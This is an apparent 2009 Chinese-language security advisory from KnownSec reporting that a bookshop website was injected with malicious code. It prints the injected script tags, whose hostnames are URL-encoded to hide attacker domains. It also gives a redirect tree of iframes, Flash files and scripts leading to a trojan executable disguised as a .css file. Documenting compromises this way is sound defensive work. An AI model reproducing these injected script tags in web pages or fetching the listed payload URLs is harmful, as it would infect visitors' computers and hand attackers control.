发布时间:Sat Oct 24 2009 21:02:53 UTC+0800
最后更新时间:Sat Oct 24 2009 21:02:53 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 北京市育成才自考书店(http://www.bookshop365.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.bookshop365.com/

网页被嵌入恶意链接代码:
<script src=http://%6B%75%6D%6F%67%72%6F%75%70%2E%63%6E></script><script src=http://%6A%61%6D%65%73%66%61%6E%73%2E%63%6E></script><script src=http://%6E%65%69%6D%65%6E%67%6E%65%74%2E%63%6E></script><script src=http://%77%75%78%69%66%64%63%2E%63%6E></script><script src=http://%7A%67%75%6E%69%6F%6E%2E%63%6E></script><script src=http://%6E%6D%67%7A%6C%74%2E%63%6E></script><script src=http://%73%68%65%6E%67%6C%76%65%2E%63%6E></script><script src=http://%65%67%65%6E%6F%6D%65%2E%63%6E></script><script src=http://%63%6C%61%6E%6E%74%2E%63%6E></script><script src=http://%35%31%33%31%34%38%2E%63%6E></script><script src=http://%79%6F%75%64%75%6E%7A%69%2E%63%6E></script><script src=http://%38%320%34%38.cn></script><script src=http://%63z%6Aj%7A%63%2Ec%6E></script><script src=http://li%6E%6Bs%6E%65t.c%6E></script><script src=http://w%75%78%69o%6C.%63n></script><script src=http://c%68%75nra%6Eg.com.%63n></script><script src=http://hn3%67p.c%6E></script><script src=http://h%68h%74li%76%65%2Ecn></script>

挂马分析:
[root]http://www.bookshop365.com/
    [script]http://js.tongji.cn.yahoo.com/879115/ystat.js
    [script]http://www.bookshop365.com/js/mystat.asp
    [script]http://www.bookshop365.com/qqonline/qq.asp
        [script]http://www.bookshop365.com/qqonline/info.asp
            [script]http://wvg7.cn
            [script]http://ckt1.cn
            [script]http://ckt1.cn
            [script]http://ckt6.cn
            [script]http://w.siyou.org.cn
            [script]http://w.jsguangji.cn
        [script]http://www.bookshop365.com/qqonline/script.asp
        [script]http://wvg7.cn
        [script]http://ckt1.cn
        [script]http://ckt1.cn
        [script]http://ckt6.cn
        [script]http://w.siyou.org.cn
            [iframe]http://nkb0.6600.org/dszq/2.htm
        [script]http://w.jsguangji.cn
            [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://kumogroup.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://jamesfans.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://neimengnet.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://wuxifdc.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
            [iframe]http://44ghe.cn/x2/xx.html
                [iframe]http://44ghe.cn/x2/td14.htm
                    [script]http://44ghe.cn/x2/14.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://44ghe.cn/x2/15.js
                    [script]http://44ghe.cn/x2/17.js
                    [script]http://44ghe.cn/x2/16.js
                    [script]http://44ghe.cn/x2/18.js
                [iframe]http://44ghe.cn/x2/yt.htm
                    [script]http://44ghe.cn/x2/a.jpg
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://44ghe.cn/x2/a1.jpg
                    [script]http://44ghe.cn/x2/c.jpg
                    [script]http://44ghe.cn/x2/d.jpg
                    [script]http://44ghe.cn/x2/e.jpg
                    [script]http://44ghe.cn/x2/f.jpg
                [iframe]http://44ghe.cn/x2/td09.htm
                    [script]http://44ghe.cn/x2/01.js
                        [exe]http://d.lnxwy.com/xx/x2.css
                    [script]http://44ghe.cn/x2/02.js
                [iframe]http://44ghe.cn/x2/yut.htm
                    [iframe]http://44ghe.cn/x2/ytfl1.htm
                        [iframe]http://44ghe.cn/x2/x1.htm
                            [script]http://44ghe.cn/x2/swfobject.js
                            [flash]http://44ghe.cn/x2/./x1.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x3.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x4.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x2.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://44ghe.cn/x2/x2.htm
                            [script]http://44ghe.cn/x2/swfobject.js
                            [flash]http://44ghe.cn/x2/./x7.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x9.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x10.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                            [flash]http://44ghe.cn/x2/./x8.swf
                                [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://44ghe.cn/x2/x1.htm
                    [iframe]http://44ghe.cn/x2/of.htm
                        [script]http://44ghe.cn/x2/of.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [script]http://44ghe.cn/x2/of3.jpg
                        [script]http://44ghe.cn/x2/of.jpg
                        [script]http://44ghe.cn/x2/of2.jpg
                [iframe]http://44ghe.cn/x2/ytu.htm
                    [iframe]http://44ghe.cn/x2/ytfl.htm
                        [iframe]http://44ghe.cn/x2/ff.html
                            [script]http://44ghe.cn/x2/ff.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://44ghe.cn/x2/ie.html
                            [script]http://44ghe.cn/x2/ie.js
                            [exe]http://d.lnxwy.com/xx/x2.css
                        [iframe]http://44ghe.cn/x2/ff.html
                        [iframe]http://44ghe.cn/x2/ie.html
                        [iframe]http://44ghe.cn/x2/ff.html
                        [iframe]http://44ghe.cn/x2/ff.html
    [script]http://zgunion.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://nmgzlt.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://shenglve.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://egenome.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://clannt.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://513148.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://youdunzi.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://82048.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://czjjzc.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://linksnet.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://wuxiol.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://chunrang.com.cn
        [iframe]http://sale.php?domain=chunrang.com.cn
    [script]http://hn3gp.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
    [script]http://hhhtlive.cn
        [iframe]http://nkb0.6600.org/dszq/2.htm
最终下载病毒文件:
http://d.lnxwy.com/xx/x2.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:1
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]